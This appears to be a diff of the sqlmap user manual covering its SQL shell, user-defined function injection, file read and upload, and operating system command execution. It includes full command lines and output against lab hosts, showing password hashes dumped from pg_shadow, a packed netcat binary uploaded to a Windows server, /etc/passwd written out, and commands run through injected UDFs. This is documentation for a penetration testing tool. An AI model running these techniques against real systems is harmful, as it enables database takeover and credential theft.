-interactively, like a SQL console connected to the back-end database
-management system.
-Note that this feature provides TAB completion and history support.</P>
-
-<P>Example of history support on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
-
-sql> SELECT 'foo'
-SELECT 'foo':    'foo'
-
-sql> [UP arrow key shows the just run SQL SELECT statement, DOWN arrow key cleans the shell]
-sql> SELECT version()
-SELECT version():    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-
-sql> exit
-
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
-
-sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell]
-sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename
-[hh:mm:45] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
-[hh:mm:46] [INPUT] the SQL query that you provide can return up to 3 entries. How many entries 
-do you want to retrieve?
-[a] All (default)
-[#] Specific number
-[q] Quit
-Choice: 2
-SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
-[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
-[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example of TAB completion on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
-
-sql> [TAB TAB]
- LIMIT 
-(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) 
-LIMIT 0, 1)='Y'
-AND ORD(MID((%s), %d, 1)) > %d
-CAST(%s AS CHAR(10000))
-COUNT(%s)
-CURRENT_USER()
-DATABASE()
-IFNULL(%s, ' ')
-LENGTH(%s)
-LIMIT %d, %d
-MID((%s), %d, %d)
-ORDER BY %s ASC
-SELECT %s FROM %s.%s
-SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)
-SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND 
-table_schema='%s'
-SELECT grantee FROM information_schema.USER_PRIVILEGES
-SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
-SELECT schema_name FROM information_schema.SCHEMATA
-SELECT table_schema, table_name FROM information_schema.TABLES
-SELECT user, password FROM mysql.user
-SLEEP(%d)
-VERSION()
-\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)
-sql> SE[TAB]
-sql> SELECT
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see the TAB functionality shows the queries defined for the
-back-end database management system in sqlmap XML queries file, but you
-can run whatever <CODE>SELECT</CODE> statement you want.</P>
-
-<P>Example of asterisk expansion on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-shell \
-  -v 2
-
-[...]
-[hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
-sql> SELECT * FROM test.users
-[hh:mm:48] [INFO] fetching SQL SELECT query output: 'SELECT * FROM test.users'
-[hh:mm:48] [INFO] you did not provide the fields in your query. sqlmap will retrieve the 
-column names itself.
-[hh:mm:48] [INFO] fetching columns for table 'users' on database 'test'
-[hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test'
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
-FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116)
-[hh:mm:48] [INFO] retrieved: 3
-[hh:mm:48] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
-information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116) LIMIT 0, 1
-[hh:mm:48] [INFO] retrieved: id
-[hh:mm:48] [DEBUG] performed 20 queries in 0 seconds
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
-information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116) LIMIT 1, 1
-[hh:mm:48] [INFO] retrieved: name
-[hh:mm:48] [DEBUG] performed 34 queries in 0 seconds
-[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
-information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116) LIMIT 2, 1
-[hh:mm:48] [INFO] retrieved: surname
-[hh:mm:48] [DEBUG] performed 55 queries in 0 seconds
-[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
-[hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:04] [DEBUG] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM 
-test.users
-[hh:mm:04] [INFO] retrieved: 5
-[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many 
-entries 
-do you want to retrieve?
-[a] All (default)
-[#] Specific number
-[q] Quit
-Choice: 3
-[hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 0, 1
-[hh:mm:09] [INFO] retrieved: 1
-[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 0, 1
-[hh:mm:09] [INFO] retrieved: luther
-[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
-test.users ORDER BY id ASC LIMIT 0, 1
-[hh:mm:09] [INFO] retrieved: blissett
-[hh:mm:09] [DEBUG] performed 62 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 1, 1
-[hh:mm:09] [INFO] retrieved: 2
-[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 1, 1
-[hh:mm:09] [INFO] retrieved: fluffy
-[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
-test.users ORDER BY id ASC LIMIT 1, 1
-[hh:mm:09] [INFO] retrieved: bunny
-[hh:mm:09] [DEBUG] performed 41 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 2, 1
-[hh:mm:09] [INFO] retrieved: 3
-[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 2, 1
-[hh:mm:09] [INFO] retrieved: wu
-[hh:mm:09] [DEBUG] performed 20 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
-test.users ORDER BY id ASC LIMIT 2, 1
-[hh:mm:09] [INFO] retrieved: ming
-[hh:mm:10] [DEBUG] performed 34 queries in 0 seconds
-SELECT * FROM test.users [3]:
-[*] 1, luther, blissett
-[*] 2, fluffy, bunny
-[*] 3, wu, ming
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see from the example, if the <CODE>SELECT</CODE> statement has
-an asterisk instead of the column(s) name, sqlmap first retrieves all
-column names of the current table, asks if the query can return multiple
-entries and goes on.</P>
-
-<P>Example of SQL statement other than <CODE>SELECT</CODE> on a <B>PostgreSQL
-8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
-sql> SELECT COUNT(name) FROM users
-[hh:mm:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
-[hh:mm:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
-[hh:mm:59] [INFO] retrieved: 4
-SELECT COUNT(name) FROM users:    '4'
-
-sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
-[hh:mm:35] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:40] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users 
-(id, name, surname) VALUES (5, 'from', 'sql shell');'
-[hh:mm:40] [INFO] done
-sql> SELECT COUNT(name) FROM users
-[hh:mm:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
-[hh:mm:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
-[hh:mm:53] [INFO] retrieved: 5
-SELECT COUNT(name) FROM users:    '5'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see from the example, when the user provides a SQL statement 
-other than <CODE>SELECT</CODE>, sqlmap recognizes it, tests if the web 
-application supports stacked queries and in case it does, it executes
-the provided SQL statement in a multiple statement mode.</P>
-
-<P>Beware that some web application technologies do not support stacked
-queries on specific database management systems. For instance, PHP does
-not support stacked queries when the back-end DBMS is MySQL, but it does
-support when the back-end DBMS is PostgreSQL.</P>
+<P>The SQL shell option allows you to run your own SQL statement
+interactively, like a SQL console connected to the database management
+system.
+This feature provides TAB completion and history support too.</P>
 
 
-<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">User-defined function injection</A>
+<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Brute force</A>
 </H2>
 
+<P>These options can be used to run brute force checks.</P>
+
+<H3>Brute force tables names</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-common-tables</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>Brute force columns names</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-common-columns</CODE></P>
+
+<P>TODO</P>
+
+
+<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">User-defined function injection</A>
+</H2>
+
+<P>These options can be used to create custom user-defined functions.</P>
+
 <H3>Inject custom user-defined functions (UDF)</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-udf-inject</CODE> and <CODE>-</CODE><CODE>-shared-lib</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-udf-inject</CODE> and <CODE>-</CODE><CODE>-shared-lib</CODE></P>
 
 <P>You can inject your own user-defined functions (UDFs) by compiling a
 MySQL or PostgreSQL shared library, DLL for Windows and shared object for
@@ -4457,11 +2197,14 @@ create the user-defined function(s) from it and, depending on your
 options, execute them. When you are finished using the injected UDFs,
 sqlmap can also remove them from the database for you.</P>
 
-<P>Example on a <B>PostgreSQL 8.4</B>:</P>
+<P>These techniques are detailed in the white paper
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
+
+<P>Example against a PostgreSQL target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
+$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
 
 [...]
 web application technology: PHP 5.2.6, Apache 2.2.9
@@ -4483,7 +2226,7 @@ do you want to retrieve the return value of the UDF? [Y/n]
 return value:    'test'
 
 do you want to call this or another injected UDF? [Y/n] n
-do you want to remove UDF 'sys_eval'? [Y/n] 
+do you want to remove UDF 'sys_eval'? [Y/n] y
 [12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only 
 be deleted manually
 </PRE>
@@ -4493,94 +2236,35 @@ be deleted manually
 <P>If you want, you can specify the shared library local file system path
 via command line using <CODE>-</CODE><CODE>-shared-lib</CODE> option.</P>
 
-<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">File system access</A>
+<P>This feature is available only when the database management system is
+MySQL or PostgreSQL.</P>
+
+
+<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">File system access</A>
 </H2>
 
 <H3>Read a file from the database server's file system</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-read-file</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-file-read</CODE></P>
 
 <P>It is possible to retrieve the content of files from the underlying file
 system when the back-end database management system is either MySQL,
 PostgreSQL or Microsoft SQL Server, and the session user has the needed
 privileges to abuse database specific functionalities and architectural
 weaknesses.
-The file specified can be either a text or a binary file. sqlmap will
-handle it automatically.</P>
+The file specified can be either a textual or a binary file. sqlmap will
+handle it properly.</P>
 
 <P>These techniques are detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target to retrieve a text file:</P>
+<P>Example against a Microsoft SQL Server 2005 target to retrieve a binary
+file:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.aspx?id=1" \
-  --read-file "C:\example.txt" -v 2
-
-[...]
-[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: PostgreSQL
-
-[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)), 
-CHR(32))
-[hh:mm:53] [INFO] retrieved: 8.3.5,
-[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
-[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
-[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
-[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
-[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data 
-LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
-CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
-[hh:mm:03] [INFO] retrieved: 1
-[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
-[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:03] [DEBUG] cleaning up the database management system
-[hh:mm:03] [DEBUG] removing support tables
-[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
-[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file 
-is binary, its content will not be retrieved
-[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
-[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
-[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
-[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
-[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM 
-sqlmapfile
-[hh:mm:04] [INFO] retrieved: 1
-[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
-||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
-[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
-[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
-[hh:mm:22] [DEBUG] cleaning up the database management system
-[hh:mm:22] [DEBUG] removing support tables
-[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
-C:/example.txt file saved to:    '/home/inquis/sqlmap/output/172.16.213.131/files/C__example.txt'
-
-[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/172.16.213.131'
-
-$ cat output/172.16.213.131/files/C__example.txt 
-This is a text file
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target to
-retrieve a binary file:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --read-file "C:\example.exe" --union-use -v 1
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --file-read "C:/example.exe" -v 1
 
 [...]
 [hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
@@ -4588,54 +2272,37 @@ web server operating system: Windows 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 
-[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
-technique
-[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name'
-[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter 
-'name' by appending a false condition after the parameter value
-[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
-inband sql injection vulnerability
-valid union:    'http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
-ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
+[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
+[hh:mm:50] [INFO] the SQL query provided returns 3 entries
+C:/example.exe file saved to:    '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
+[...]
 
-[hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:54] [INFO] fetching file: 'C:/example.exe'
-[hh:mm:54] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to:    '/home/inquis/sqlmap/output/172.16.213.131/files/
-C__example.exe'
+$ ls -l output/192.168.136.131/files/C__example.exe 
+-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
 
-[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
-172.16.213.131'
-
-$ ls -l output/172.16.213.131/files/C__example.exe 
--rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/172.16.213.131/files/C__example.exe
-
-$ file output/172.16.213.131/files/C__example.exe 
-output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+$ file output/192.168.136.131/files/C__example.exe 
+output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
+80386 32-bit
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
 
-<H3>Write a local file on the database server's file system</H3>
+<H3>Upload a file to the database server's file system</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-write-file</CODE> and <CODE>-</CODE><CODE>-dest-file</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-file-write</CODE> and <CODE>-</CODE><CODE>-file-dest</CODE></P>
 
-<P>It is possible to upload a local file to the database server file system
+<P>It is possible to upload a local file to the database server's file system
 when the back-end database management system is either MySQL, PostgreSQL
 or Microsoft SQL Server, and the session user has the needed privileges to
 abuse database specific functionalities and architectural weaknesses.
-The file specified can be either a text or a binary file. sqlmap will
-handle it automatically.</P>
+The file specified can be either a textual or a binary file. sqlmap will
+handle it properly.</P>
 
 <P>These techniques are detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target to upload a binary UPX-compressed
-file:</P>
+<P>Example against a MySQL target to upload a binary UPX-compressed file:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
@@ -4645,8 +2312,8 @@ $ file /tmp/nc.exe.packed
 $ ls -l /tmp/nc.exe.packed
 -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
 
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" --write-file \
-  "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
+  "/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
 
 [...]
 [hh:mm:29] [INFO] the back-end DBMS is MySQL
@@ -4654,13 +2321,7 @@ web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:29] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:29] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:29] [INFO] retrieved: 5.0.67
-[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:36] [INFO] retrieved: C
-[hh:mm:36] [INFO] the back-end DBMS operating system is Windows
+[...]
 do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
 written on the back-end DBMS file system? [Y/n] y
 [hh:mm:52] [INFO] retrieved: 31744
@@ -4670,504 +2331,155 @@ same size as the local file '/tmp/nc.exe.packed'
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>Example on a <B>PostgreSQL 8.4</B> target to upload a text file:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 \
-  --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1
 
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: PostgreSQL
-
-[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:01] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:01] [INFO] retrieved: 8.4.2
-[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:07] [INFO] retrieved: 0
-[hh:mm:07] [INFO] retrieved: 0
-[hh:mm:07] [INFO] the back-end DBMS operating system is Linux
-do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully 
-written on the back-end DBMS file system? [Y/n] 
-[hh:mm:14] [INFO] retrieved: 2264
-[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, 
-same size as the local file '/etc/passwd'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Operating system access</A>
+<H2><A NAME="ss5.13">5.13</A> <A HREF="#toc5.13">Operating system takeover</A>
 </H2>
 
-<H3>Execute arbitrary operating system command</H3>
+<H3>Run arbitrary operating system command</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-os-cmd</CODE> and <CODE>-</CODE><CODE>-os-shell</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-os-cmd</CODE> and <CODE>-</CODE><CODE>-os-shell</CODE></P>
 
-<P>It is possible to execute arbitrary commands on the underlying operating
-system when the back-end database management system is either MySQL,
-PostgreSQL or Microsoft SQL Server, and the session user has the needed
-privileges to abuse database specific functionalities and architectural
-weaknesses.</P>
+<P>It is possible to <B>run arbitrary commands on the database server's
+underlying operating system</B> when the back-end database management
+system is either MySQL, PostgreSQL or Microsoft SQL Server, and the
+session user has the needed privileges to abuse database specific
+functionalities and architectural weaknesses.</P>
 
 <P>On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality
 explained above) a shared library (binary file) containing two
 user-defined functions, <CODE>sys_exec()</CODE> and <CODE>sys_eval()</CODE>, then
-it creates these two functions on the database and call one of them to
-execute the specified command, depending on the user's choice to display
-the standard output or not.
-On Microsoft SQL Server, sqlmap abuses the <CODE>xp_cmshell</CODE> stored
-procedure: if it's disabled, sqlmap re-enables it; if it does not exist,
-sqlmap creates it from scratch.</P>
+it creates these two functions on the database and calls one of them to
+execute the specified command, depending on user's choice to display the
+standard output or not.
+On Microsoft SQL Server, sqlmap abuses the <CODE>xp_cmdshell</CODE> stored
+procedure: if it is disabled (by default on Microsoft SQL Server >= 2005),
+sqlmap re-enables it; if it does not exist, sqlmap creates it from
+scratch.</P>
 
-<P>If the user wants to retrieve the command standard output, sqlmap will use
-one of the enumeration SQL injection techniques (blind or inband) to
-retrieve it or, in case of stacked query SQL injection technique,
-sqlmap will execute the command without returning anything to the user.</P>
+<P>When the user requests the standard output, sqlmap uses one of the
+enumeration SQL injection techniques (blind, inband or error-based) to
+retrieve it. Vice versa, if the standard output is not required, stacked
+query SQL injection technique is used to execute the command.</P>
 
 <P>These techniques are detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
 
-<P>It is possible to specify a single command to be executed with the
-<CODE>-</CODE><CODE>-os-cmd</CODE> option.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
+<P>Example against a PostgreSQL target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.aspx?id=1" \
-  --os-cmd "whoami" -v 1
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
+  --os-cmd id -v 1
 
 [...]
-[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: PostgreSQL
+[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
+[hh:mm:12] [INFO] testing if current user is DBA
+[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
+[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
+[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
 
-[hh:mm:05] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:05] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:05] [INFO] retrieved: 8.3.5,
-[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:15] [INFO] retrieved: 1
-[hh:mm:16] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:16] [INFO] testing if current user is DBA
-[hh:mm:16] [INFO] retrieved: 1
-[hh:mm:16] [INFO] checking if sys_exec UDF already exist
-[hh:mm:16] [INFO] retrieved: 0
-[hh:mm:18] [INFO] checking if sys_eval UDF already exist
-[hh:mm:18] [INFO] retrieved: 0
-[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file
-[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file
